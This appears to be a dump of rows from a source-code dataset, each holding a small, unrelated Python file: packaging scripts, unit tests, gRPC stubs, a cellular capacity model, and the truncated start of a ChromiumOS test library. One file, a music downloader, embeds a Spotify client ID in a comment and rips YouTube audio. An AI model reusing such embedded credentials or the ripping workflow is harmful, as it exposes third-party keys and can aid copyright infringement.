max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
setup.py | jaj42/infupy | 0 | 12766751 | from setuptools import setup
setup(name = 'infupy',
version = '2022.1.11',
description = 'Syringe pump infusion',
url = 'https://github.com/jaj42/infupy',
author = '<NAME>',
author_email = '<EMAIL>',
license = 'ISC',
packages = ['infupy', 'infupy.backends', 'infupy.gui'],
install_requires=[
'pyserial',
'crcmod',
'qtpy'
],
scripts = [
'scripts/syre.pyw'
]
)
| 0.894531 | 1 |
0x11-python-network_1/0-hbtn_status.py | ricardo1470/holbertonschool-higher_level_programming | 0 | 12766752 | <gh_stars>0
#!/usr/bin/python3
""" script that fetches https://intranet.hbtn.io/status
-You must use the package urllib
-You must use a with statement """
import urllib.request
if __name__ == '__main__':
url = 'https://intranet.hbtn.io/status'
with urllib.request.urlopen(url) as response:
req_pag = response.read()
print("Body response:")
print("\t- type: {}".format(type(req_pag)))
print("\t- content: {}".format(req_pag))
print("\t- utf8 content: {}".format(req_pag.decode('utf-8')))
| 3.234375 | 3 |
pyt/__main__.py | jayvdb/pyt | 1 | 12766753 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, print_function, absolute_import
import sys
import platform
import argparse
import os
from pyt import tester, __version__, main
from pyt.compat import *
def console():
# ripped from unittest.__main__.py
if sys.argv[0].endswith("__main__.py"):
executable = os.path.basename(sys.executable)
sys.argv[0] = executable + " -m pyt"
if is_py2:
from unittest.main import USAGE_AS_MAIN
main.USAGE = USAGE_AS_MAIN
main(module=None)
if __name__ == "__main__":
# allow both imports of this module, for entry_points, and also running this module using python -m pyt
console()
| 2.421875 | 2 |
password_validator/tests/test_input_validator.py | sglavoie/dev-helpers | 5 | 12766754 | <gh_stars>1-10
# Standard library imports
from decimal import Decimal
from typing import Any
# Third-party libraries
import pytest
# Local imports
from pcs.input_validator import InputValidator
def test_input_is_set_to_value_passed_as_argument():
"""
The `input` class attribute of InputValidator should be set correctly.
"""
input_string = "test_string"
assert InputValidator(input_string).input == input_string
def test__raise_value_error_on_empty_input():
"""
The tool should not accept an empty password.
"""
with pytest.raises(ValueError):
assert InputValidator("")
@pytest.mark.parametrize(
"input_",
[
(None),
(True),
(2j),
(Decimal(12)),
(b"asd"),
(12345),
(["asd"]),
(("asd",)),
({"asd": "123"}),
({}),
],
)
def test__raise_type_error_on_input_not_being_a_string(input_: Any):
"""
The tool should not accept anything that is not a string.
"""
with pytest.raises(TypeError):
assert InputValidator(input_)
| 2.78125 | 3 |
showcase1/com/aaron/sysexample.py | qsunny/python | 0 | 12766755 | <reponame>qsunny/python
# -*- coding: utf-8 -*-
#from sys import argv,path,modules,exec_prefix
from sys import *
def printCommandParam():
"""打印命令行参数"""
print(type(argv))
for commandParam in argv:
print(commandParam)
def printModuleSearchPath():
"""打印模块搜索路径"""
print(type(path))
for subpath in path:
print(subpath)
def printModuleDictionary():
"""打印模块dictionary"""
for module in modules:
print(module)
def printStaticObjectInfo():
"""sys模块静态对象信息"""
#print(copyright)
print(exec_prefix)
print(executable)
print(hash_info)
print(implementation)
print(platform)
print(prefix)
print(thread_info)
print(version)
print(version_info)
# exit(2)
displayhook('a')
def print_hello():
print("export")
if __name__=="__main__" :
printCommandParam()
printModuleSearchPath()
printModuleDictionary()
#print(printCommandParam.__doc__)
printStaticObjectInfo()
| 2.28125 | 2 |
scripts/capacity.py | edwardoughton/uk_digital_networks | 0 | 12766756 | """
Capacity estimation method.
Written by <NAME>
December 12th 2019
This method can be used for any spatially aggregated unit, such as
postcode sectors or local authority districts. First, a points in
polygon analysis needs to provide the total number of 4G or 5G sites
in an area, in order to then get the density of assets. This method
then allocates the estimated capacity to the area.
"""
import os
import sys
import configparser
import csv
from itertools import tee
from collections import OrderedDict
CONFIG = configparser.ConfigParser()
CONFIG.read(os.path.join(os.path.dirname(__file__), 'script_config.ini'))
BASE_PATH = CONFIG['file_locations']['base_path']
DATA_RAW = os.path.join(BASE_PATH, 'raw')
DATA_INTERMEDIATE = os.path.join(BASE_PATH, 'intermediate')
def load_capacity_lookup_table(path):
"""
Load a lookup table created using pysim5G:
https://github.com/edwardoughton/pysim5g
"""
capacity_lookup_table = {}
# for path in PATH_LIST:
with open(path, 'r') as capacity_lookup_file:
reader = csv.DictReader(capacity_lookup_file)
for row in reader:
if float(row["capacity_mbps_km2"]) <= 0:
continue
environment = row["environment"].lower()
cell_type = row["ant_type"]
frequency = str(int(float(row["frequency_GHz"]) * 1e3))
bandwidth = str(row["bandwidth_MHz"])
generation = str(row["generation"])
density = float(row["sites_per_km2"])
capacity = float(row["capacity_mbps_km2"])
if (environment, cell_type, frequency, bandwidth, generation) \
not in capacity_lookup_table:
capacity_lookup_table[(
environment, cell_type, frequency, bandwidth, generation)
] = []
capacity_lookup_table[(
environment, cell_type, frequency, bandwidth, generation
)].append((
density, capacity
))
for key, value_list in capacity_lookup_table.items():
value_list.sort(key=lambda tup: tup[0])
return capacity_lookup_table
def estimate_area_capacity(assets, area, clutter_environment,
capacity_lookup_table, simulation_parameters):
"""
Find the macrocellular Radio Access Network capacity given the
area assets and deployed frequency bands.
"""
capacity = 0
for frequency in ['700', '800', '1800', '2600', '3500', '26000']:
unique_sites = set()
for asset in assets:
for asset_frequency in asset['frequency']:
if asset_frequency == frequency:
unique_sites.add(asset['site_ngr'])
site_density = float(len(unique_sites)) / area
bandwidth = find_frequency_bandwidth(frequency,
simulation_parameters)
if frequency == '700' or frequency == '3500' or frequency == '26000':
generation = '5G'
else:
generation = '4G'
if site_density > 0:
tech_capacity = lookup_capacity(
capacity_lookup_table,
clutter_environment,
'macro',
str(frequency),
str(bandwidth),
generation,
site_density,
)
else:
tech_capacity = 0
capacity += tech_capacity
return capacity
def find_frequency_bandwidth(frequency, simulation_parameters):
"""
Finds the correct bandwidth for a specific frequency from the
simulation parameters.
"""
simulation_parameter = 'channel_bandwidth_{}'.format(frequency)
if simulation_parameter not in simulation_parameters.keys():
KeyError('{} not specified in simulation_parameters'.format(frequency))
bandwidth = simulation_parameters[simulation_parameter]
return bandwidth
def pairwise(iterable):
"""
Return iterable of 2-tuples in a sliding window.
>>> list(pairwise([1,2,3,4]))
[(1,2),(2,3),(3,4)]
"""
a, b = tee(iterable)
next(b, None)
return zip(a, b)
def lookup_capacity(lookup_table, environment, cell_type, frequency, bandwidth,
generation, site_density):
"""
Use lookup table to find capacity by clutter environment geotype,
frequency, bandwidth, technology generation and site density.
"""
# print(lookup_table)
if (environment, cell_type, frequency, bandwidth, generation) not in lookup_table:
raise KeyError("Combination %s not found in lookup table",
(environment, cell_type, frequency, bandwidth, generation))
density_capacities = lookup_table[
(environment, cell_type, frequency, bandwidth, generation)
]
lowest_density, lowest_capacity = density_capacities[0]
if site_density < lowest_density:
return 0
for a, b in pairwise(density_capacities):
lower_density, lower_capacity = a
upper_density, upper_capacity = b
if lower_density <= site_density and site_density < upper_density:
result = interpolate(
lower_density, lower_capacity,
upper_density, upper_capacity,
site_density
)
return result
# If not caught between bounds return highest capacity
highest_density, highest_capacity = density_capacities[-1]
return highest_capacity
def interpolate(x0, y0, x1, y1, x):
"""
Linear interpolation between two values.
"""
y = (y0 * (x1 - x) + y1 * (x - x0)) / (x1 - x0)
return y
if __name__ == '__main__':
#define parameters
PARAMETERS = {
'channel_bandwidth_700': '10',
'channel_bandwidth_800': '10',
'channel_bandwidth_1800': '10',
'channel_bandwidth_2600': '10',
'channel_bandwidth_3500': '40',
'channel_bandwidth_3700': '40',
'channel_bandwidth_26000': '200',
'macro_sectors': 3,
'small-cell_sectors': 1,
'mast_height': 30,
}
#define assets
ASSETS = [
{
'site_ngr': 'A',
'frequency': ['800', '2600'],
'technology': '4G',
'type': 'macrocell_site',
'bandwidth': '2x10MHz',
'build_date': 2018,
},
{
'site_ngr': 'B',
'frequency': ['800', '2600'],
'technology': '4G',
'type': 'macrocell_site',
'bandwidth': '2x10MHz',
'build_date': 2018,
},
]
path = os.path.join(DATA_RAW, 'capacity_lut_by_frequency_10.csv')
capacity_lookup_table = load_capacity_lookup_table(path)
area_capacity = estimate_area_capacity(ASSETS, 10, 'urban',
capacity_lookup_table, PARAMETERS)
print(area_capacity)
| 3.390625 | 3 |
examples/fangcloud/apiserver.py | zjuchenyuan/EasyLogin | 33 | 12766757 | <reponame>zjuchenyuan/EasyLogin
#coding:utf-8
"""
使用fangcloud.py提供的download函数提供网页服务
Example:
https://api.chenyuan.me/fangcloud/448eb45f0d08cbf37c33f35419
"""
from cyserver import CYServer
from fangcloud import download
def do_GET(self):
path = self.path.split("/")
if path[1]=="fangcloud":
try:
url = download(path[2])
return self._302(url)
except Exception as e:
return self._fail(e)
else:
return self._hello()
if __name__=="__main__":
CYServer(8080,do_GET).run() | 2.328125 | 2 |
Desafio Python/Aula 10 des29.py | ayresmajor/Curso-python | 0 | 12766758 | <reponame>ayresmajor/Curso-python<filename>Desafio Python/Aula 10 des29.py
print('\033[1:33m = \033[m'*20)
velocidade = float(input('Qual foi a velocidade atingida pelo seu carro? '))
print('\033[1:33m - \033[m'*20)
multa = ( (velocidade - 80) * 7)
if velocidade<= 80:
print('Parabéns vc não ultrapassou o limite de velocidade.')
else:
print('\033[:31mVocê ultrapassou o limite de 80km/h irá receber uma multa de \033[1:33m{:.2f}€.'.format(multa))
| 3.890625 | 4 |
tests/test_client.py | pryds/dataserv-client | 1 | 12766759 | <reponame>pryds/dataserv-client<filename>tests/test_client.py
import unittest
import datetime
import time
from dataserv_client import common
from dataserv_client import cli
from dataserv_client import api
from dataserv_client import exceptions
url = "http://127.0.0.1:5000"
address_alpha = "<KEY>"
address_beta = "<KEY>"
address_gamma = "<KEY>"
address_delta = "<KEY>"
address_zeta = "<KEY>"
address_eta = "<KEY>"
address_theta = "<KEY>"
address_iota = "<KEY>"
address_lambda = "<KEY>"
address_mu = "1DNe4PPhr6raNbADsHABGSpm6XQi7KhSTo"
address_nu = "<KEY>"
address_pi = "<KEY>"
address_omicron = "<KEY>"
address_kappa = "<KEY>"
address_ksi = "15xu7JLwqZB9ZakrfZQJF5AJpNDwWabqwA"
address_epsilon = "1FwSLAJtpLrSQp94damzWY2nK5cEBugZfC"
address_rho = "1EYtmt5QWgwATbJvnVP9G9cDXrMcX5bHJ"
address_sigma = "12qx5eKHmtwHkrpByYBdosRwUfSfbGsqhT"
address_tau = "1MfQwmCQaLRxAAij1Xii6BxFtkVvjrHPc2"
address_upsilon = "1MwWa91KJGzctsY<KEY>"
address_phi = "1LRVczz1Ln1ECom7oVotEmUVLKbxofQfKS"
address_chi = "12zhPViCGssXWiUMeGuEYgqLFr1wF1MJH9"
address_psi = "<KEY>"
address_omega = "<KEY>"
class AbstractTestSetup(object):
def setUp(self):
time.sleep(2) # avoid collision
class TestClientRegister(AbstractTestSetup, unittest.TestCase):
def test_register(self):
client = api.Client(address_alpha, url=url)
self.assertTrue(client.register())
def test_already_registered(self):
def callback():
client = api.Client(address_beta, url=url)
client.register()
client.register()
self.assertRaises(exceptions.AddressAlreadyRegistered, callback)
def test_invalid_address(self):
def callback():
client = api.Client("xyz", url=url)
client.register()
self.assertRaises(exceptions.InvalidAddress, callback)
def test_invalid_farmer(self):
def callback():
client = api.Client(address_nu, url=url + "/xyz")
client.register()
self.assertRaises(exceptions.FarmerNotFound, callback)
def test_address_required(self):
def callback():
api.Client().register()
self.assertRaises(exceptions.AddressRequired, callback)
class TestClientPing(AbstractTestSetup, unittest.TestCase):
def test_ping(self):
client = api.Client(address_gamma, url=url)
self.assertTrue(client.register())
self.assertTrue(client.ping())
def test_invalid_address(self):
def callback():
client = api.Client("xyz", url=url)
client.ping()
self.assertRaises(exceptions.InvalidAddress, callback)
def test_invalid_farmer(self):
def callback():
client = api.Client(address_delta, url=url + "/xyz")
client.ping()
self.assertRaises(exceptions.FarmerNotFound, callback)
def test_address_required(self):
def callback():
api.Client().ping()
self.assertRaises(exceptions.AddressRequired, callback)
class TestClientPoll(AbstractTestSetup, unittest.TestCase):
def test_poll(self):
client = api.Client(address_zeta, url=url)
self.assertTrue(client.poll(register_address=True, limit=60))
def test_address_required(self):
def callback():
api.Client().poll()
self.assertRaises(exceptions.AddressRequired, callback)
class TestClientVersion(AbstractTestSetup, unittest.TestCase):
def test_version(self):
client = api.Client(url=url)
self.assertEqual(client.version(), api.__version__)
class TestInvalidArgument(AbstractTestSetup, unittest.TestCase):
def test_invalid_retry_limit(self):
def callback():
api.Client(connection_retry_limit=-1)
self.assertRaises(exceptions.InvalidArgument, callback)
def test_invalid_retry_delay(self):
def callback():
api.Client(connection_retry_delay=-1)
self.assertRaises(exceptions.InvalidArgument, callback)
class TestConnectionRetry(AbstractTestSetup, unittest.TestCase):
def test_no_retry(self):
def callback():
client = api.Client(address=address_kappa,
url="http://invalid.url",
connection_retry_limit=0,
connection_retry_delay=0)
client.register()
before = datetime.datetime.now()
self.assertRaises(exceptions.ConnectionError, callback)
after = datetime.datetime.now()
print("NO RETRY", after - before)
self.assertTrue(datetime.timedelta(seconds=15) > (after - before))
def test_default_retry(self):
def callback():
client = api.Client(address=address_kappa,
url="http://invalid.url")
client.register()
before = datetime.datetime.now()
self.assertRaises(exceptions.ConnectionError, callback)
after = datetime.datetime.now()
print("DEFAULT RETRY", after - before)
seconds = (
common.DEFAULT_CONNECTION_RETRY_LIMIT *
common.DEFAULT_CONNECTION_RETRY_DELAY
)
self.assertTrue(datetime.timedelta(seconds=seconds) < (after - before))
class TestClientBuild(AbstractTestSetup, unittest.TestCase):
# TODO test default path
# TODO test custom path
# TODO test shard size
# TODO test if height set
# TODO test cleanup
def test_build(self):
client = api.Client(address_pi, url=url, debug=True,
max_size=1024*1024*256) # 256MB
client.register()
hashes = client.build(cleanup=True)
self.assertTrue(len(hashes) == 2)
client = api.Client(address_omicron, url=url, debug=True,
max_size=1024*1024*512) # 512MB
client.register()
hashes = client.build(cleanup=True)
self.assertTrue(len(hashes) == 4)
def test_address_required(self):
def callback():
api.Client().build()
self.assertRaises(exceptions.AddressRequired, callback)
class TestClientCliArgs(AbstractTestSetup, unittest.TestCase):
def test_poll(self):
args = [
"--address=" + address_eta,
"--url=" + url,
"poll",
"--register_address",
"--delay=5",
"--limit=60"
]
self.assertTrue(cli.main(args))
def test_register(self):
args = ["--address=" + address_theta, "--url=" + url, "register"]
self.assertTrue(cli.main(args))
def test_ping(self):
args = ["--address=" + address_iota, "--url=" + url, "register"]
self.assertTrue(cli.main(args))
args = ["--address=" + address_iota, "--url=" + url, "ping"]
self.assertTrue(cli.main(args))
def test_no_command_error(self):
def callback():
cli.main(["--address=" + address_lambda])
self.assertRaises(SystemExit, callback)
def test_input_error(self):
def callback():
cli.main([
"--address=" + address_mu,
"--url=" + url,
"poll",
"--register_address",
"--delay=5",
"--limit=xyz"
])
self.assertRaises(ValueError, callback)
def test_api_error(self):
def callback():
cli.main(["--address=xyz", "--url=" + url, "register"])
self.assertRaises(exceptions.InvalidAddress, callback)
if __name__ == '__main__':
unittest.main()
| 2.125 | 2 |
boggle/boggle_types.py | RacingTadpole/boggle | 0 | 12766760 | <gh_stars>0
from typing import Tuple, Sequence
Position = Tuple[int, int, str]
Board = Sequence[str] | 2.234375 | 2 |
confusionflow/logging/run.py | HendrikStrobelt/confusionflow | 2 | 12766761 | <reponame>HendrikStrobelt/confusionflow<filename>confusionflow/logging/run.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
from confusionflow.logging.utils import (
check_folderpath,
update_runindex,
update_datasetindex,
create_logdir,
create_dataset_config,
)
from confusionflow.logging import FoldLog
class Run:
"""
Run is a simple wrapper for simplifying the logging of an experiment.
"""
def __init__(self, runId, folds, trainfoldId):
self.runId = runId
self.folds = folds
self.trainfoldId = trainfoldId
self.foldlogs = list()
for fold in self.folds:
foldlog = self.create_foldlog(fold.foldId)
self.foldlogs.append(foldlog)
def get_keras_calback(self, loss):
from confusionflow.logging.callbacks import RunLogger
runlogger = RunLogger(self, loss)
return runlogger
def export(self, logdir):
create_logdir(logdir)
run_path = check_folderpath(os.path.join(logdir, "runs"))
filepath = os.path.join(run_path, self.runId + ".json")
with open(filepath, "w") as outfile:
json.dump(self.asdict(), outfile)
update_runindex(logdir)
for fold in self.folds:
create_dataset_config(logdir, fold.dataset_config)
update_datasetindex(logdir)
for foldlog in self.foldlogs:
foldlog.export(logdir)
def create_foldlog(self, foldId):
foldlogId = self.runId + "_" + foldId
return FoldLog(foldlogId, self.runId, foldId)
def asdict(self):
d = dict()
d["runId"] = self.runId
d["trainfoldId"] = self.trainfoldId
d["hyperparam"] = dict()
d["foldlogs"] = []
for foldlog in self.foldlogs:
d["foldlogs"].append(foldlog.asdict())
return d
| 2.265625 | 2 |
music_dl.py | tylors1/musicDownloader | 0 | 12766762 | import sys
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
import spotipy.util as util
import codecs
import help_us
import get_spotify
import get_wikipedia
import fix_tags
import get_youtube
# client_credentials_manager = SpotifyClientCredentials(client_id='60e52fd7ef4849568a7c057416d33554', client_secret='<KEY>')
username = 'USERNAME'
scope = 'user-library-read'
# Keep track failed meta searches
open('incomplete_meta.txt', 'w').close()
open('unable_to_download.txt', 'w').close()
incomplete_meta = []
unable_to_download = []
def get_da_music(text_to_search, tag_check):
if "youtube.com" in text_to_search.strip():
text_to_search, text_to_search_corrected = get_youtube.get_video_title(text_to_search.strip()), ""
else:
text_to_search, text_to_search_corrected = help_us.correct_search(text_to_search)
duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres = get_meta_data(text_to_search, text_to_search_corrected)
if not track_name:
track_name = text_to_search_corrected if text_to_search_corrected else text_to_search
if tag_check:
duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres = fix_tags.tag_entry(duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres)
download_url = get_youtube.find_url(track_name, artist)
if not all((track_name, cover_art, artist, album, album_date, genres)):
incomplete_meta.append(text_to_search + '\n')
with open("incomplete_meta.txt", "a") as myfile:
myfile.write(text_to_search + '\n')
if not download_url:
print "Unable to download"
unable_to_download.append(track_name + " " + artist + '\n')
with open("unable_to_download.txt", "a") as myfile:
myfile.write(track_name + " " + artist + '\n')
return 0
file_name = get_youtube.youtube_download(track_name, download_url, artist)
fix_tags.set_tags(file_name, [duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres])
#Attempts spotify, then wikipedia
def get_meta_data(text_to_search, text_to_search_corrected):
duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres = (' ',)*9
duration, track_name, track_id, track_number, cover_art, artist, album = get_spotify.get_spotify_data(text_to_search, text_to_search_corrected)
if not track_name:
print "Unable to find meta data from spotify"
else:
album_date, genres = get_wikipedia.get_date_genre(track_name, artist, album)
return duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres
def main():
while True:
print
print "Enter nothing to exit, ctrl+c to cancel script,"
print "\"file\" to enter a file name"
print
print "Song Name - Artist or youtube url"
text_to_search = raw_input()
if not text_to_search.strip():
print incomplete_meta
sys.exit()
elif text_to_search.strip() == "file":
print "File should be in current working directory. Enter file name(txt):"
file_name = raw_input()
with codecs.open(file_name, 'r') as f:
num_lines = sum(1 for line in open(file_name))
for count, line in enumerate(f):
if len(line) > 1:
print
print
print count, "of", num_lines
print line
get_da_music(line, False)
# elif text_to_search.strip() == "spotify":
# get_user_tracks('USERNAME')
else:
get_da_music(text_to_search, True)
main() | 2.734375 | 3 |
rf_command.py | glzjin/eventbridge-client-for-consumer | 0 | 12766763 | import serial
import struct
rf_channel_list = [b"\x01", b"\x02", b"\x03", b"\x04"]
def send_rf_command(config_class, channel, is_study = False):
ser = serial.Serial(
port = config_class.tty,
baudrate = 9600,
parity = serial.PARITY_NONE,
stopbits = serial.STOPBITS_ONE,
bytesize = serial.EIGHTBITS
)
ser.flushInput()
ser.flushOutput()
if is_study:
data = b"\xAA"
else:
data = b"\xBB"
data += rf_channel_list[channel]
data += b"\xFF"
ser.write(data)
ser.flushInput()
ser.flushOutput()
ser.close()
| 2.640625 | 3 |
tests.py | ranocha/nodepy | 41 | 12766764 | <reponame>ranocha/nodepy<filename>tests.py
#!/usr/bin/env python
import matplotlib
matplotlib.use('Agg')
import doctest
import nodepy
import unittest
import os
import subprocess
import tempfile
import sys
import nbformat
if sys.version_info >= (3,0):
kernel = 'python3'
else:
kernel = 'python2'
def _notebook_run(path):
"""Execute a notebook via nbconvert and collect output.
:returns (parsed nb object, execution errors)
"""
with tempfile.NamedTemporaryFile(suffix=".ipynb") as fout:
args = ["jupyter", "nbconvert", "--to", "notebook", "--execute",
"--ExecutePreprocessor.timeout=120",
"--ExecutePreprocessor.kernel_name="+kernel,
"--output", fout.name, path]
subprocess.check_call(args)
fout.seek(0)
nb = nbformat.reads(fout.read().decode('utf-8'), nbformat.current_nbformat)
errors = [output for cell in nb.cells if "outputs" in cell
for output in cell["outputs"]
if output.output_type == "error"]
return nb, errors
def run_tests():
for filename in os.listdir('./examples'):
if (filename.split('.')[-1] == 'ipynb' and
filename not in ['Internal_stability_SO.ipynb',
'Introduction to NodePy.ipynb',
'stability_polynomial_speed.ipynb']):
print('running notebook: '+ filename)
_, errors = _notebook_run('./examples/'+filename)
if errors != []:
raise(Exception)
for module_name in ['runge_kutta_method',
'linear_multistep_method',
'twostep_runge_kutta_method',
'downwind_runge_kutta_method',
'ivp',
'low_storage_rk',
'rooted_trees',
'snp',
'stability_function',
'general_linear_method',
'ode_solver',
'semidisc',
'strmanip',
'utils',
'graph',
'convergence',
'loadmethod']:
module = nodepy.__getattribute__(module_name)
doctest.testmod(module)
unittest.main(module='nodepy.unit_tests',exit=False)
if __name__ == '__main__':
run_tests()
| 2.25 | 2 |
test_evocraft_py/minecraft_pb2_grpc.py | shyamsn97/test-evocraft-py | 1 | 12766765 | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
import test_evocraft_py.minecraft_pb2 as minecraft__pb2
class MinecraftServiceStub(object):
"""*
The main service.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.spawnBlocks = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/spawnBlocks',
request_serializer=minecraft__pb2.Blocks.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.readCube = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/readCube',
request_serializer=minecraft__pb2.Cube.SerializeToString,
response_deserializer=minecraft__pb2.Blocks.FromString,
)
self.fillCube = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/fillCube',
request_serializer=minecraft__pb2.FillCubeRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class MinecraftServiceServicer(object):
"""*
The main service.
"""
def spawnBlocks(self, request, context):
"""* Spawn multiple blocks.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def readCube(self, request, context):
"""* Return all blocks in a cube
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def fillCube(self, request, context):
"""* Fill a cube with a block type
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MinecraftServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'spawnBlocks': grpc.unary_unary_rpc_method_handler(
servicer.spawnBlocks,
request_deserializer=minecraft__pb2.Blocks.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'readCube': grpc.unary_unary_rpc_method_handler(
servicer.readCube,
request_deserializer=minecraft__pb2.Cube.FromString,
response_serializer=minecraft__pb2.Blocks.SerializeToString,
),
'fillCube': grpc.unary_unary_rpc_method_handler(
servicer.fillCube,
request_deserializer=minecraft__pb2.FillCubeRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'dk.itu.real.ooe.MinecraftService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class MinecraftService(object):
"""*
The main service.
"""
@staticmethod
def spawnBlocks(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/spawnBlocks',
minecraft__pb2.Blocks.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def readCube(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/readCube',
minecraft__pb2.Cube.SerializeToString,
minecraft__pb2.Blocks.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def fillCube(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/fillCube',
minecraft__pb2.FillCubeRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 2.171875 | 2 |
python/ray/experimental/sgd/tfbench/model_config.py | cumttang/ray | 3 | 12766766 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model configurations for CNN benchmarks.
"""
from . import resnet_model
_model_name_to_imagenet_model = {
'resnet50': resnet_model.create_resnet50_model,
'resnet50_v2': resnet_model.create_resnet50_v2_model,
'resnet101': resnet_model.create_resnet101_model,
'resnet101_v2': resnet_model.create_resnet101_v2_model,
'resnet152': resnet_model.create_resnet152_model,
'resnet152_v2': resnet_model.create_resnet152_v2_model,
}
_model_name_to_cifar_model = {}
def _get_model_map(dataset_name):
if 'cifar10' == dataset_name:
return _model_name_to_cifar_model
elif dataset_name in ('imagenet', 'synthetic'):
return _model_name_to_imagenet_model
else:
raise ValueError('Invalid dataset name: %s' % dataset_name)
def get_model_config(model_name, dataset):
"""Map model name to model network configuration."""
model_map = _get_model_map(dataset.name)
if model_name not in model_map:
raise ValueError('Invalid model name \'%s\' for dataset \'%s\'' %
(model_name, dataset.name))
else:
return model_map[model_name]()
def register_model(model_name, dataset_name, model_func):
"""Register a new model that can be obtained with `get_model_config`."""
model_map = _get_model_map(dataset_name)
if model_name in model_map:
raise ValueError('Model "%s" is already registered for dataset "%s"' %
(model_name, dataset_name))
model_map[model_name] = model_func
| 1.820313 | 2 |
Curso em Video/ex020.py | CamilliCerutti/Exercicios-de-Python-curso-em-video | 0 | 12766767 | # SORTEANDO UMA ORDEM NA LISTA
# O mesmo professor do ex 19 quer sortear a ordem de apresentação de trabalhos dos alunos. Faça um programa que leia o nome dos quatro alunos e mostre a ordem sorteada.
from random import sample, choice
a1 = input('Digite o nome do primeiro aluno: ')
a2 = input('Digite o nome do segundo aluno: ')
a3 = input('Digite o nome do terceiro aluno: ')
a4 = input('Digite o nome do quarto aluno: ')
lista = [a1, a2, a3, a4]
print(f'A ordem de apresentação sera a seguinte:{sample((lista),k=4)}')
| 3.765625 | 4 |
lib/cros_test_lib.py | khromiumos/chromiumos-chromite | 0 | 12766768 | <reponame>khromiumos/chromiumos-chromite
# -*- coding: utf-8 -*-
# Copyright (c) 2011 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Cros unit test library, with utility functions."""
from __future__ import print_function
import collections
import contextlib
import functools
import os
import re
import sys
import time
import unittest
import mock
import six
from six.moves import StringIO
from chromite.lib import cache
from chromite.lib import constants
from chromite.lib import commandline
from chromite.lib import cros_build_lib
from chromite.lib import cros_logging as logging
from chromite.lib import operation
from chromite.lib import osutils
from chromite.lib import parallel
from chromite.lib import partial_mock
from chromite.lib import remote_access
from chromite.lib import retry_util
from chromite.lib import terminal
from chromite.lib import timeout_util
from chromite.utils import outcap
# Define custom pytestmarks, allowing us to run/skip tests by category.
# Our Pytest marks are documented in chromite/pytest.ini.
# For more about marks, see https://docs.pytest.org/en/latest/mark.html
# Because Pytest is not always present outside the chroot, we must wrap
# our mark definitions in a try/except block.
# TODO(crbug.com/1058422): Once pytest is available in all runtime envs,
# add pytestmarks directly in test files.
try:
import pytest # pylint: disable=import-error
pytest_skip = pytest.skip
pytestmark_inside_only = pytest.mark.inside_only
pytestmark_network_test = pytest.mark.network_test
pytestmark_skip = pytest.mark.skip
pytestmark_skipif = pytest.mark.skipif
except (ImportError, AttributeError):
# If Pytest is not present, or too old to allow pytest.mark,
# define custom pytestmarks as null functions for test files to use.
null_decorator = lambda obj: obj
pytest_skip = lambda allow_module_level: True
pytestmark_inside_only = null_decorator
